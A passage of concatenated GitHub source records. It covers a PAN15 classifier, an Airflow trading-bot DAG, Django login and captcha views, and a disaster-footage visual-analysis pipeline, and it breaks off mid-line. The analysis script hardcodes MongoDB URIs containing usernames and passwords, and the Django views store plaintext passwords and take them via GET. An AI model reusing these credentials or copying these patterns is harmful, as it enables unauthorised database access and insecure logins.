os.path.join(model_path_dir, 'model.pkl')\n joblib.dump(clf, path_save)\n path_model = os.path.abspath(path_save)\n return path_model\n\n\ndef classifier_predict(model_path, dict_test, output_path_dir):\n proba = []\n output = {}\n for key in dict_test:\n val = dict_test.get(key, None)\n if val:\n feature_value_test.append(val)\n\n z = np.array(feature_value_test)\n for subdir, dirs, files in os.walk(model_path):\n for file_ in files:\n if file_ == 'model.pkl':\n model_file = subdir + os.path.sep + file_\n estimator = joblib.load(model_file)\n pred = estimator.predict_proba(z)[:, 1]\n pred_accuracy = estimator.predict(z)\n \n k = 0\n for key in dict_test.keys():\n output[key] = pred[k]\n k += 1\n sorted_output = OrderedDict(sorted(output.items(), key=lambda s: s[0]))\n ofile = os.path.join(output_path_dir, \"answers.txt\")\n output_file = open(ofile, 'w')\n for key, value in sorted_output.iteritems():\n output_file.write(key + \"\\t\" + str(round(value, 3)) + \"\\n\")\n output_file.close()\n path_output = os.path.abspath(\"answers.txt\")\n return path_output\n\n","repo_name":"yunitata/PAN15","sub_path":"classifier.py","file_name":"classifier.py","file_ext":"py","file_size_in_byte":2412,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"86451734295","text":"import os\nfrom airflow import DAG\nfrom airflow.operators.bash import BashOperator\nfrom datetime import datetime, timedelta\n\nPROJECT_DIR = '/Users/christopherdancel/Documents/github/trading_bot/'\nPROJECT_MAIN = os.path.join(PROJECT_DIR, 'main.py')\nPYTHON_ENV = '/Users/christopherdancel/.virtualenvs/trading_bot_test/bin/python'\n\ndefault_args = {\n 'owner': 'me',\n 'schedule_interval': None,\n 'start_date': datetime(2015, 12, 1),\n 'retries': 0,\n}\ndag = DAG('trading_bot', catchup=False, default_args=default_args)\n\nt1 = BashOperator(\n task_id='build_history',\n bash_command=f\"cd {PROJECT_DIR} && {PYTHON_ENV} {PROJECT_MAIN} --build_history\",\n dag=dag)\n\nt2 = BashOperator(\n task_id='forecast',\n bash_command=f'cd {PROJECT_DIR} && {PYTHON_ENV} {PROJECT_MAIN} --forecast',\n dag=dag)\n\nt3 = BashOperator(\n task_id='email',\n bash_command=f'cd {PROJECT_DIR} && {PYTHON_ENV} {PROJECT_MAIN} --email',\n dag=dag)\n\nt1 >> t2 >> t3\n","repo_name":"ChrisDancel/trading_bot","sub_path":"trading_bot_dag.py","file_name":"trading_bot_dag.py","file_ext":"py","file_size_in_byte":955,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"73611155434","text":"from django.http import HttpResponse\nfrom django.shortcuts import render, redirect\n\n# Create your views here.\nimport string\nimport random\nfrom captcha.image import ImageCaptcha\n\nfrom log_regapp.models import User\n\n\ndef login(request):\n return render(request,'log_regapp/login.html')\n\n\n\ndef check_user(request):\n name = request.GET.get(\"username\")\n pwd = request.GET.get(\"userpwd\")\n print(\"*******=======*************\")\n result = User.objects.filter(email=name, password=pwd)\n if result:\n request.session['who']=result[0].nickname\n request.session['status'] = '1'\n return HttpResponse('0')\n return HttpResponse(\"1\")\n\ndef checkcap(request):\n captcha = request.GET.get(\"captcha\")\n # print(captcha)#能拿到用户输入的验证码\n cod0 = request.session.get(\"code\")\n print(\"cod0==\", cod0)\n if captcha.lower() == cod0.lower():\n return HttpResponse(\"1\")\n return HttpResponse(\"0\")\n\n\n\n\n\n\n\n\n\ndef regist(requet):\n return render(requet,'log_regapp/regist.html')\n\n\n\n\ndef registlogic(request):\n tel=request.POST.get('phone')\n request.session['tel']=tel\n nickname=request.POST.get('nickname')\n password=request.POST.get('txt_password')\n User.objects.create(email=tel,nickname=nickname,password=password,status=1)\n request.session['who']=nickname\n request.session['status']='1'\n return redirect('log_regapp:regist_ok')\n\ndef regist_ok(request):\n t=request.session.get('tel')\n n=request.session.get('who')\n del request.session['tel']\n print(t)\n return render(request,'log_regapp/regist_ok.html',{'T':t,'N':n})\n\n\n\n\n\n\n\n\n\n\n\n\n\n# ajax验证注册号码是否已经存在\ndef check(request):\n name = request.GET.get(\"username\")\n print(name, \"====================\") # 能接收到\n\n result = User.objects.filter(email=name) # 在数据库中比对\n print(result, \"result\")\n if result:\n # return HttpResponse(\"right_3.jpg\")\n return HttpResponse(\"0\") # 存在是0\n if name:\n return HttpResponse(\"1\") # 通过是1\n return HttpResponse(\"0\")\n\n\n\n\n# 生成验证码\n\ndef getcaptcha(request):\n image = ImageCaptcha() # 构造一个Image对象\n code = random.sample(string.ascii_letters + string.digits, 5) # 随机产生5个随机数\n code = \"\".join(code)\n print(code)\n request.session[\"code\"] = code # 存储验证码\n data = image.generate(code)\n print(data)\n return HttpResponse(data, \"image/png\")\n\n\n\n\n\n\ndef indent(request):\n return render(request,'log_regapp/indent.html')\n\n\n\ndef order_info(request):\n name=request.POST.get('receive_people')\n print(name)\n address=request.POST.get('position')\n post_code=request.POST.get('post_code')\n tel=request.POST.get('tel')\n cart=request.session.get('cart')\n print(name,address,post_code,tel)\n return redirect('payapp:page1', cart.total_price)\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"brytlevson/dbook1","sub_path":"log_regapp/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2890,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"39855523328","text":"from pymongo import MongoClient\nimport time\nimport requests\nfrom bson.json_util import ObjectId\nimport json\nfrom web_functions import WebFunctions\nimport cv2\nimport os\nimport predictors\nfrom collections import Counter\nfrom keras.models import load_model\nfrom datetime import datetime\nimport tensorflow as tf\nimport numpy as np\nimport subprocess\n# from pixellib.instance import instance_segmentation\nfrom pixellib.semantic import semantic_segmentation\nimport cv2\nfrom imutils import paths\nimport imutils\nfrom os.path import exists\nimport matplotlib.pyplot as plt\nimport logging\nfrom PST.model import WCT2\nfrom PST.data_processing import build_input_pipe, restore_image\nfrom PST.utils import http_get_img, get_local_img, display_outputs\n\n# ============= For log file ============= #\nlf = open(\"logfilename.log\", \"w\") # Create a new log file to keep record only for current analysis\n\n# Define log file - it will contain anything printed in console\nlogging.basicConfig(filename=\"logfilename.log\", level=logging.INFO)\n\nMONGO_URI = \"mongodb+srv://dora_user:wk9NmSQIPqgXNf8O@doracluster.se2tb.mongodb.net/ImagesDB?ssl=true&ssl_cert_reqs=CERT_NONE\" # Atlas MongoDB\n# MONGO_URI = \"mongodb://xr4d_visuals_user:B6^M2qAe@xr4drama.iti.gr:27017/XR4D_Visual_Analysis_DB\" # Local MongoDB\ndb = MongoClient(MONGO_URI)\n\n\ndef detect_blur_fft(image, size=60, thresh=10):\n # grab the dimensions of the image and use the dimensions to\n # derive the center (x, y)-coordinates\n (h, w) = image.shape\n (cX, cY) = (int(w / 2.0), int(h / 2.0))\n\n # compute the FFT to find the frequency transform, then shift\n # the zero frequency component (i.e., DC component located at\n # the top-left corner) to the center where it will be more\n # easy to analyze\n\n fft = np.fft.fft2(image)\n fftShift = np.fft.fftshift(fft)\n\n # zero-out the center of the FFT shift (i.e., remove low\n # frequencies), apply the inverse shift such that the DC\n # component once again becomes the top-left, and then apply\n # the inverse FFT\n fftShift[cY - size:cY + size, cX - size:cX + size] = 0\n fftShift = np.fft.ifftshift(fftShift)\n recon = np.fft.ifft2(fftShift)\n\n # compute the magnitude spectrum of the reconstructed image,\n # then compute the mean of the magnitude values\n magnitude = 20 * np.log(np.abs(recon))\n mean = np.mean(magnitude)\n # the image will be considered \"blurry\" if the mean value of the\n # magnitudes is less than the threshold value\n return (mean, mean <= thresh)\n\n\ndef visual_analysis(simmoid, sendtoKB, sendtoRec, pst):\n\n # Update request's status in MongoDB\n # db.ImagesDB.InputQueue.update_one(filter={\"input.simmoid\": input[\"simmoid\"]}, update= {\"$set\": {\"status\": 1}}) # 1: In Progress\n # print(\"Input with simmoid {} is being analyzed!\")\n\n # visual_analysis(input)\n print(\"[INFO] Analyzing input with simmoid {}. Please wait...\".format(simmoid))\n logging.info(\"Analyzing input with simmoid {}. Please wait...\".format(simmoid))\n\n # ------------------------------------------------------------------------------ #\n # ----------------------------- Vusual Analysis -------------------------------- #\n # ------------------------------------------------------------------------------ #\n # time.sleep(2) # Simulating visual analysis\n # test() # Testing the usage of functions from other py files\n\n # Get request from MongoDB by simmoid\n input_request = db.ImagesDB.InputQueue.find_one(filter={\"input.simmoid\": simmoid})['input']\n # input_request = db.XR4D_Visual_Analysis_DB.InputQueue.find_one(filter={\"input.simmoid\": simmoid})['input']\n # print(input_request)\n\n # Check entity: image, video or twitter_post?\n entity = input_request['entity']\n print(\"[INFO] Entity: \", entity)\n logging.info(\"Entity: \", entity)\n\n # Get and keep project_id to send to KB, (3D rec and geoserver?)\n project_id = input_request['project_id']\n print(\"project id: \", project_id)\n logging.info(\"project id: \", project_id)\n\n ####################################################################################################################\n # ====================== TWITTER POST ======================== # TWITTER POST\n ####################################################################################################################\n # Check if the input is a twitter post and proceed with proper analysis\n flag_twitter = False\n entities = []\n urls = []\n if entity == \"twitter_post\":\n print(\"[INFO] Analyzing input twitter post...\")\n logging.info(\"Analyzing input twitter post...\")\n\n flag_twitter = True\n\n # simmo_id = request_json[\"simmoid\"]\n\n # Get JSON file with info\n r = WebFunctions.get_json(simmoid, entity)\n input_json = r.json()\n # print(input_json)\n items = input_json[\"items\"]\n len_items = len(items)\n print(\"Length of items list\", len(items))\n logging.info(\"Length of items list\", len(items))\n for i in range(1, len_items):\n current_item = items[i][0]\n dictionary = current_item[1]\n print(dictionary[\"url\"])\n logging.info(dictionary[\"url\"])\n print(dictionary[\"type\"])\n logging.info(dictionary[\"type\"])\n urls.append(dictionary[\"url\"])\n entities.append(dictionary[\"type\"])\n\n ####################################################################################################################\n # ====================== IMAGE ANALYSIS ======================== # IMAGE\n ####################################################################################################################\n # Check if the input is an image, a video or a twitter post and proceed with proper analysis\n if entity == \"image\" or \"image\" in entities or \"IMAGE\" in entities:\n print(\"[INFO] Analyzing input image...\")\n logging.info(\"Analyzing input image...\")\n\n # Check if entity comes from a Twitter Post:\n if flag_twitter:\n\n # Defile subpaths\n image_path = \"Data/\" + entity + \"_\" + simmoid + \"/\"\n only_filename = simmoid + \".jpg\"\n save_filename = image_path + only_filename # This is the path/filename where the downloaded video will be saved # ToDo: Folders\n\n # Create directory to save image if it does not exist\n if not os.path.exists(image_path):\n os.makedirs(image_path)\n # Download image (# TODO: This works only for 1 image/item now - Do for multiple!!!\n url = urls[0]\n\n print(\"[INFO] Image will be downloaded from \", url)\n\n # Count time to download video and split it in frames\n t1 = time.time()\n\n # --------------------> Download image\n WebFunctions.download_from_url(url, image_path, only_filename) # TODO: uncommend this once server is up\n\n # # TODO: commend this ---------------\n # online_image = requests.get(url)\n # print(online_image)\n #\n # if online_image.status_code == 200:\n # open(save_filename, 'wb').write(online_image.content)\n # # TODO: ------------------------------\n\n image = cv2.imread(save_filename)\n print(\"[INFO] Loaded image: \", simmoid + \".jpg\")\n logging.info(\"Loaded image: \", simmoid + \".jpg\")\n\n # --------------------- Create JSON for KB -----------------------#\n # For KB - Information only per video shot\n KB_JSON = {}\n KB_JSON[\"header\"] = {\"timestamp\": str(datetime.now(tz=None)), \"sender\": \"Visual Analysis\", \"entity\": entity,\n \"simmoid\": simmoid, \"project_id\": project_id} # ToDo\n KB_JSON[\"shotInfo\"] = []\n\n # Save extracted info for each image for KB\n shot_info_dict_KB = {}\n shot_info_dict_KB[\"shotIdx\"] = 0\n shot_info_dict_KB[\"startFrame\"] = 0\n shot_info_dict_KB[\"endFrame\"] = 0\n # shot_info_dict_KB[\"area\"] = []\n # shot_info_dict_KB[\"areaProb\"] = []\n # shot_info_dict_KB[\"outdoor\"] = []\n # shot_info_dict_KB[\"emergencyType\"] = []\n # shot_info_dict_KB[\"emergencyProb\"] = []\n shot_info_dict_KB[\"objectsFound\"] = []\n shot_info_dict_KB[\"peopleInDanger\"] = 0\n shot_info_dict_KB[\"vehiclesInDanger\"] = 0\n shot_info_dict_KB[\"riverOvertop\"] = False\n\n # --------------------- Load ML models -----------------------#\n\n # load model for SR # ToDo: way not load model everytime?\n SR_model = load_model('Trained_models/SR/xr4drama_places_model_ep5_bs32.h5')\n print(\"[INFO] SR model is successfully loaded!\")\n logging.info(\"SR model is successfully loaded!\")\n\n # load model for EmC\n EmC_model = load_model('Trained_models/EmC/vgg16_places2_lastconv_19ep_1e-03lr_MME2017.pkl')\n print(\"[INFO] EmC model is successfully loaded!\")\n logging.info(\"EmC model is successfully loaded!\")\n\n if pst:\n # load model for PST\n # train_tfrec = \"PST/tfrecords/train.tfrec\"\n # val_tfrec = \"PST/tfrecords/val.tfrec\"\n\n model = WCT2(image_size=None, lr=1e-4, gram_loss_weight=1.0)\n model.wct.load_weights(model.checkpoint_path)\n # model.train(train_tfrec, epochs=10, batch_size=8)\n\n model.wct.save_weights(model.checkpoint_path)\n\n print(\"[INFO] PST model is successfully loaded!\")\n logging.info(\"PST model is successfully loaded!\")\n\n # load model for BOL\n semantic_segmentation_model = semantic_segmentation()\n semantic_segmentation_model.load_ade20k_model(\"Trained_models/BOL/Pixellib/deeplabv3_xception65_ade20k.h5\")\n print(\"[INFO] BOL model is successfully loaded!\")\n logging.info(\"BOL model is successfully loaded!\")\n\n # --------------------- Scene Recognition (SR)-----------------------#\n\n # Run SR model\n scene, sr_prob, is_outdoor = predictors.SR_model(image, SR_model)\n # SR_model.clear\n\n shot_info_dict_KB[\"area\"] = scene\n shot_info_dict_KB[\"areaProb\"] = sr_prob/100\n shot_info_dict_KB[\"outdoor\"] = is_outdoor\n\n # --------------------- Emergency Classification (EmC) ---------------------#\n\n # Run EmC model\n emergency, emc_prob = predictors.EmC_model(image, EmC_model)\n\n shot_info_dict_KB[\"emergencyType\"] = emergency\n shot_info_dict_KB[\"emergencyProb\"] = np.float64(emc_prob)\n # emergencies.append(emergency)\n # emc_probs.append(emc_prob)\n\n # Check if we will use PST or not\n if pst:\n # --------------------- Photorealistic Style Transfer (PST) ---------------------#\n # rst = None\n rst = 64 * 14 # (896)\n # test_id = np.random.randint(1, 60)\n # test_id = 20\n\n # start = datetime.datetime.now()\n # content = get_local_img(\"./examples/input/tar55.png\".format(test_id), rst)\n content = get_local_img(image_path + str(simmoid) + \".jpg\", rst)\n style = get_local_img(\"PST/examples/style/tar44.png\", rst)\n\n output = model.transfer(tf.cast(content, tf.float32), tf.cast(style, tf.float32), 0.8)\n\n plt.imsave(image_path + str(simmoid) + \"_pst.jpg\", output[0] / 255.0)\n\n # -------------- Building and Object Localization (BOL) ---------------#\n # Run BOL model\n segvalues, objects_masks, image_overlay = semantic_segmentation_model.segmentAsAde20k(\n image_path + str(simmoid) + \"_pst.jpg\", overlay=False, extract_segmented_objects=True,\n output_image_name=image_path + str(simmoid) + \"_mask.png\")\n else:\n\n # -------------- Building and Object Localization (BOL) ---------------#\n\n # Run BOL model\n # segvalues, segoverlay = semantic_segmentation_model.segmentAsAde20k(\n # image_path + str(simmoid) + \".jpg\", overlay=False,\n # output_image_name=image_path + str(simmoid) + \"_mask.png\")\n segvalues,image_overlay = semantic_segmentation_model.segmentAsAde20k(\n image_path + str(simmoid) + \".jpg\", overlay=False,\n output_image_name=image_path + str(simmoid) + \"_mask.png\")\n\n for l in range(0, len(segvalues['class_names'])):\n objects_dict = {'type': segvalues['class_names'][l], 'probability': segvalues['ratios'][l] / 100}\n shot_info_dict_KB['objectsFound'].append(objects_dict)\n\n # print(frames_path + \"frame_\" + str(frame_idx) + \".jpg\")\n\n KB_JSON[\"shotInfo\"].append(shot_info_dict_KB)\n\n print(KB_JSON[\"shotInfo\"])\n logging.info(KB_JSON[\"shotInfo\"])\n\n # Save KB_JSON file\n with open(image_path + 'KB.json', 'w') as f:\n json.dump(KB_JSON, f)\n\n # Save output for KB (maybe this will be inside the analysis function)\n db.ImagesDB.VisualsOutputKB.insert_one(KB_JSON)\n # db.XR4D_Visual_Analysis_DB.VisualsOutputKB.insert_one(KB_JSON)\n\n #################################################################################################################\n # ====================== VIDEO ANALYSIS ======================== # VIDEO\n #################################################################################################################\n # Check if the input is a video and proceed with proper analysis\n if entity == \"video\" or \"video\" in entities or \"VIDEO\" in entities:\n print(\"[INFO] The analysis for input video is starting...\")\n logging.info(\"The analysis for input video is starting...\")\n\n if flag_twitter == True:\n url = urls[0] # ToDo: This supports only 1 video from Twitter <--- support > 1\n else:\n # TODO ---> uncomment once xr4drama server is up\n # simmo_id = request_json[\"simmoid\"]\n\n # Get JSON file with info\n r = WebFunctions.get_json(simmoid, entity)\n input_json = r.json()\n print(input_json)\n logging.info(input_json)\n\n # Get video url\n if \"alternativeUrl\" in input_json.keys():\n if not input_json[\"alternativeUrl\"] == '':\n url = input_json[\"alternativeUrl\"]\n else:\n url = input_json[\"url\"]\n else:\n url = input_json[\"url\"]\n\n if not os.path.exists(\"Data\"):\n os.makedirs(\"Data\")\n\n # Defile subpaths\n video_path = \"Data/\" + entity + \"_\" + simmoid + \"/\"\n frames_path = video_path + \"Frames/\"\n masks_path = video_path + \"Masks/\"\n proc_frames_path = video_path + \"Proc_Frames/\"\n pst_frame_path = video_path + \"PST_Frames/\"\n only_filename = simmoid + \".mp4\"\n save_filename = video_path + only_filename # This is the path/filename where the downloaded video will be saved # ToDo: Folders\n\n # Create directory to save video if it does not exist\n if not os.path.exists(video_path):\n os.makedirs(video_path)\n\n # Create directory to save masks if it does not exist\n if not os.path.exists(masks_path):\n os.makedirs(masks_path)\n\n # Create directory to save processed frames if it does not exist\n if not os.path.exists(proc_frames_path):\n os.makedirs(proc_frames_path)\n\n # Create directory to save video frames\n if not os.path.exists(frames_path) or not exists(video_path+\"avg_blurriness.txt\"):\n os.makedirs(frames_path, exist_ok=True)\n\n print(\"[INFO] Video will be downloaded from \", url)\n logging.info(\"Video will be downloaded from \", url)\n\n # Count time to download video and split it in frames\n t1 = time.time()\n\n # --------------------> Download video\n WebFunctions.download_from_url(url, video_path, only_filename) #TODO: uncommend this once server is up\n\n # TODO: commend this ---------------\n online_video = requests.get(url)\n print(online_video)\n logging.info(online_video)\n\n if online_video.status_code == 200:\n open(save_filename, 'wb').write(online_video.content)\n # TODO: ------------------------------\n\n video_cap = cv2.VideoCapture(save_filename)\n print(\"[INFO] Loaded video: \", simmoid + \".mp4\")\n logging.info(\" Loaded video: \", simmoid + \".mp4\")\n\n # Read and save every video frame\n print(\"[INFO] Splitting video in frames...\")\n logging.info(\"Splitting video in frames...\")\n blur_idx = 0 # number of frames with mean >= 0\n blur_avg = 0\n frame_idx = 0\n while video_cap.isOpened():\n ret, frame = video_cap.read()\n # if frame is read correctly ret is True\n if not ret:\n print(\"[INFO] Can't get another frame. Exiting ...\")\n logging.info(\"Can't get another frame. Exiting ...\")\n break\n else:\n cv2.imwrite(frames_path + \"frame_\" + str(frame_idx) + \".jpg\", frame)\n frame_idx = frame_idx + 1\n\n # Detect blurry frames, get the avg mean value to set threshold\n frame_resized = imutils.resize(frame, width=500)\n gray_frame = cv2.cvtColor(frame_resized, cv2.COLOR_BGR2GRAY)\n\n # apply our blur detector using the FFT\n (mean, blurry) = detect_blur_fft(gray_frame, size=60, thresh=18)\n\n if mean >= 0:\n blur_avg = blur_avg + mean\n blur_idx = blur_idx + 1\n\n video_cap.release()\n print(\"[INFO] Number of frames: {}, Frames are saved in {}\".format(frame_idx - 1, frames_path))\n logging.info(\"Number of frames: {}, Frames are saved in {}\".format(frame_idx - 1, frames_path))\n blur_avg = blur_avg/(blur_idx)\n\n # Write this in a txt file\n with open(video_path+\"avg_blurriness.txt\", \"w\") as blur_file:\n blur_file.write(str(blur_avg))\n\n t2 = time.time()\n print(t2 - t1, \" sec\")\n logging.info(t2 - t1, \" sec\")\n else:\n with open(video_path+\"avg_blurriness.txt\", \"r\") as blur_file:\n blur_avg = float(blur_file.readline())\n\n print(\"[INFO] Average blurriness in video is \", blur_avg)\n logging.info(\"Average blurriness in video is \", blur_avg)\n\n # --------------------------> Shot Detection\n print(\"[INFO] Splitting video into shots...\")\n logging.info(\"Splitting video into shots...\")\n # Count time for video shot detection\n t1 = time.time()\n subprocess.run(\"python TransNetV2-master/inference/transnetv2.py \" + save_filename)\n\n # # predictors.shot_detection(save_filename)\n # # K.clear_session() # TODO!!!\n #\n # Save shot detection info in lists to use it\n start_frame = []\n end_frame = []\n\n # Read txt with shot info\n shot_filename = save_filename+\".scenes.txt\"\n shot_file = open(shot_filename, \"r\")\n shots_num = 0\n for line in shot_file:\n start_frame.append(line.split()[0])\n end_frame.append(line.split()[-1])\n shots_num = shots_num + 1\n print(\"[INFO] Shot boundary detection finished!\")\n logging.info(\"Shot boundary detection finished!\")\n t2 = time.time()\n print(t2 - t1, \" sec\")\n logging.info(t2 - t1, \" sec\")\n\n # ------------- Scene Recognition (for every shot) --------------#\n # & #\n # ------------- Emergency Detection (for every shot) ------------#\n\n # Using keyframes to get a result that characterizes the whole video shot\n # ToDo: Extract keyframes per video shot and analyze only them!!!\n\n # Create the needed dictionaries to save extracted info # TODO: add json output for geoserver! + ProjectID?\n\n # For KB - Information only per video shot\n KB_JSON = {}\n KB_JSON[\"header\"] = {\"timestamp\": str(datetime.now(tz=None)), \"sender\": \"Visual Analysis\", \"entity\": entity, \"simmoid\": simmoid, \"project_id\": project_id} #ToDo\n KB_JSON[\"shotInfo\"] = []\n\n # For 3D Rec - Information per video shot for SR + all processed frames\n Rec_JSON = {}\n Rec_JSON[\"header\"] = {\"timestamp\": str(datetime.now(tz=None)), \"sender\": \"Visual Analysis\", \"entity\": entity,\n \"simmoid\": simmoid, \"project_id\": project_id} # ToDo test with project_id too!!\n Rec_JSON[\"shotInfo\"] = []\n\n # Information to keep in my MongoDB (VisualsOutput collection) - Full analysis info (per shot for SR, per frame BOL)\n full_JSON = {}\n full_JSON[\"header\"] = {\"timestamp\": str(datetime.now(tz=None)), \"entity\": entity, \"simmoid\": simmoid}\n full_JSON[\"shotInfo\"] = []\n\n video_info_dict = {}\n video_info_dict[\"simmoid\"] = simmoid\n\n print(\"[INFO] ----> Analysing video, please wait...\")\n logging.info(\"----> Analysing video, please wait...\")\n\n # load model for SR\n SR_model = load_model('Trained_models/SR/xr4drama_places_model_ep5_bs32.h5')\n print(\"[INFO] SR model is successfully loaded!\")\n logging.info(\"SR model is successfully loaded!\")\n\n # load model for EmC\n EmC_model = load_model('Trained_models/EmC/vgg16_places2_lastconv_19ep_1e-03lr_MME2017.pkl')\n print(\"[INFO] EmC model is successfully loaded!\")\n logging.info(\"EmC model is successfully loaded!\")\n\n if pst:\n # load model for PST\n # train_tfrec = \"PST/tfrecords/train.tfrec\"\n # val_tfrec = \"PST/tfrecords/val.tfrec\"\n\n model = WCT2(image_size=None, lr=1e-4, gram_loss_weight=1.0)\n model.wct.load_weights(model.checkpoint_path)\n # model.train(train_tfrec, epochs=10, batch_size=8)\n\n model.wct.save_weights(model.checkpoint_path)\n\n print(\"[INFO] PST model is successfully loaded!\")\n logging.info(\"PST model is successfully loaded!\")\n\n # load model for BOL\n semantic_segmentation_model = semantic_segmentation()\n semantic_segmentation_model.load_ade20k_model(\"Trained_models/BOL/Pixellib/deeplabv3_xception65_ade20k.h5\")\n print(\"[INFO] BOL model is successfully loaded!\")\n logging.info(\"BOL model is successfully loaded!\")\n\n for shot_idx in range(0, shots_num):\n\n # # Create a separate folder for the processed frames of each video shot\n # if not os.path.exists(proc_frames_path + \"shot\" + str(shot_idx)):\n # os.makedirs(proc_frames_path + \"shot\" + str(shot_idx))\n\n # Save extracted info (per video shot) - for KB\n shot_info_dict_KB = {}\n shot_info_dict_KB[\"shotIdx\"] = shot_idx\n shot_info_dict_KB[\"startFrame\"] = start_frame[shot_idx]\n shot_info_dict_KB[\"endFrame\"] = end_frame[shot_idx]\n # shot_info_dict_KB[\"area\"] = []\n # shot_info_dict_KB[\"areaProb\"] = []\n # shot_info_dict_KB[\"outdoor\"] = []\n # shot_info_dict_KB[\"emergencyType\"] = []\n # shot_info_dict_KB[\"emergencyProb\"] = []\n # shot_info_dict_KB[\"objectsFound\"] = [{\"type\": \"building\", \"probability\": 0.67}, {\"type\": \"traffic light\", \"probability\": 0.44}] # TODO: add actual objects\n shot_info_dict_KB[\"objectsFound\"] = []\n shot_info_dict_KB[\"peopleInDanger\"] = 0\n shot_info_dict_KB[\"vehiclesInDanger\"] = 0\n shot_info_dict_KB[\"riverOvertop\"] = False\n\n # Save extracted info (per video shot) - for 3D Rec\n shot_info_dict_3D_rec = {}\n shot_info_dict_3D_rec[\"shotIdx\"] = shot_idx\n shot_info_dict_3D_rec[\"startFrame\"] = start_frame[shot_idx]\n shot_info_dict_3D_rec[\"endFrame\"] = end_frame[shot_idx]\n shot_info_dict_3D_rec[\"frameInfo\"] = []\n\n frame_info_dict_3D_rec = {}\n # frame_info_dict_3D_rec[\"frameNum\"] = 0\n # frame_info_dict_3D_rec[\"procFrameUrl\"] = \"\"\n\n # For the output to 3d reconstruction\n blur_classes = [\"person\", \"car\", \"bus\", \"truck\", \"minibike\", \"bicycle\", \"van\", \"animal\"]\n remove_classes = [\"sky\", \"sea\", \"signboard\"]\n # keep_classes = [\"wall\", \"building\", \"road\", \"sidewalk\", \"house\", \"column\", \"skyscraper\", \"path\", \"stairs\", \\\n # \"stairway\", \"bridge\", \"tower\", \"fountain\", \"sculpture\"]\n #\n # keep_classes_2 = [\"wall\", \"building\", \"floor\", \"road\", \"grass\", \"sidewalk\", \"earth\", \"door\", \"mountain\", \\\n # \"house\", \"field\", \"fence\", \"river\", \"rock\", \"column\", \"skyscraper\", \"path\", \"stairs\", \\\n # \"stairway\", \"bridge\", \"hill\", \"bench\", \"tower\", \"land\", \"escalator\", \"fountain\", \"swimming\", \\\n # \"sculpture\"]\n\n print(\"\\n\\n[INFO] ----> Analyzing shot \", shot_idx)\n logging.info(\"----> Analyzing shot \", shot_idx)\n n = 4 # get SR result per n frames\n frames = []\n scenes = []\n sr_probs = []\n are_outdoor = []\n emergencies = []\n emc_probs = []\n frame_counter = 0 # how many frames were analysed\n frames_for_rec_num = 0 # how many frames were automatically selected to be sent to 3D reconstruction service\n for frame_idx in range(int(start_frame[shot_idx])+5, int(end_frame[shot_idx])-5, n): # +5 frames from the start frame of the video shot to avoid shot transition artifacts\n\n # Add frame number for the output to 3d reconstruction\n frame_info_dict_3D_rec[\"frameNum\"] = frame_idx\n # frame_info_dict_3D_rec[\"procFrameUrl\"] = \"\"\n\n frames.append(frame_idx)\n # print(\"Number of frame analyzed: \", frame_idx)\n # Get frame\n frame = cv2.imread(frames_path + \"frame_\" + str(frame_idx) + \".jpg\")\n\n # Run SR model\n scene, sr_prob, is_outdoor = predictors.SR_model(frame, SR_model)\n scenes.append(scene)\n sr_probs.append(sr_prob)\n are_outdoor.append(is_outdoor)\n print(\"Scene: {}, Probability: {}\".format(scene, sr_prob))\n logging.info(\"Scene: {}, Probability: {}\".format(scene, sr_prob))\n\n # Run EmC model\n emergency, emc_prob = predictors.EmC_model(frame, EmC_model)\n emergencies.append(emergency)\n emc_probs.append(emc_prob)\n\n # Check if we will use PST or not\n if pst:\n os.makedirs(pst_frame_path, exist_ok=True)\n # rst = None\n rst = 64 * 12 # (896)\n # test_id = np.random.randint(1, 60)\n # test_id = 20\n\n # start = datetime.datetime.now()\n # content = get_local_img(\"./examples/input/tar55.png\".format(test_id), rst)\n content = get_local_img(frames_path + \"frame_\" + str(frame_idx) + \".jpg\", rst)\n style = get_local_img(\"PST/examples/style/tar44.png\", rst)\n\n output = model.transfer(tf.cast(content, tf.float32), tf.cast(style, tf.float32), 0.8)\n\n plt.imsave(pst_frame_path + \"frame_\" + str(frame_idx) + \".jpg\", output[0] / 255.0)\n\n # Run BOL model\n segvalues, objects_masks, image_overlay = semantic_segmentation_model.segmentAsAde20k(\n pst_frame_path + \"frame_\" + str(frame_idx) + \".jpg\", overlay=False, extract_segmented_objects=True,\n output_image_name=masks_path + \"frame_\" + str(frame_idx) + \"_mask.png\")\n\n else:\n\n # Run BOL model\n segvalues, objects_masks, image_overlay = semantic_segmentation_model.segmentAsAde20k(frames_path + \"frame_\" + str(frame_idx) + \".jpg\", overlay=False, extract_segmented_objects=True,\n output_image_name=masks_path + \"frame_\" + str(frame_idx) + \"_mask.png\")\n\n print(frames_path + \"frame_\" + str(frame_idx) + \".jpg\")\n logging.info(frames_path + \"frame_\" + str(frame_idx) + \".jpg\")\n print(segvalues['class_names'])\n logging.info(segvalues['class_names'])\n print(segvalues['ratios'])\n logging.info(segvalues['ratios'])\n\n # Upload mask to file storage\n url = \"http://xr4drama.iti.gr:5002/fileUpload/masks\"\n # Open the image in read-only format.\n file = {'file': open(masks_path + \"frame_\" + str(frame_idx) + \"_mask.png\", 'rb')}\n uploaded_file_url = WebFunctions.send_post(url, file, False)\n print(\"Mask url: \", uploaded_file_url)\n logging.info(\"Mask url: \", uploaded_file_url)\n\n building_class = False\n building_ratio = 0\n wall_class = False\n wall_ratio = 0\n\n if len(shot_info_dict_KB['objectsFound']) > 0:\n for o in range(0, len(segvalues['class_names'])):\n found = 0 # flag to see if label was saved so that we have it once for the shot\n for dict_idx in range(len(shot_info_dict_KB['objectsFound'])):\n my_dict = shot_info_dict_KB['objectsFound'][dict_idx]\n\n if segvalues['class_names'][o] == my_dict['type']:\n found = 1\n # check if the current probability is greater than the saved one\n if my_dict['probability'] < segvalues['ratios'][o]:\n shot_info_dict_KB['objectsFound'][dict_idx][\"probability\"] = segvalues['ratios'][o]\n\n if found == 0 and segvalues['class_names'][o] in predictors.wanted_ade20k_labels and segvalues['ratios'][o] > 1: # 1/100 = 0.01 threshold of ratio to take into account the class\n objects_dict = {}\n objects_dict['type'] = segvalues['class_names'][o]\n objects_dict['probability'] 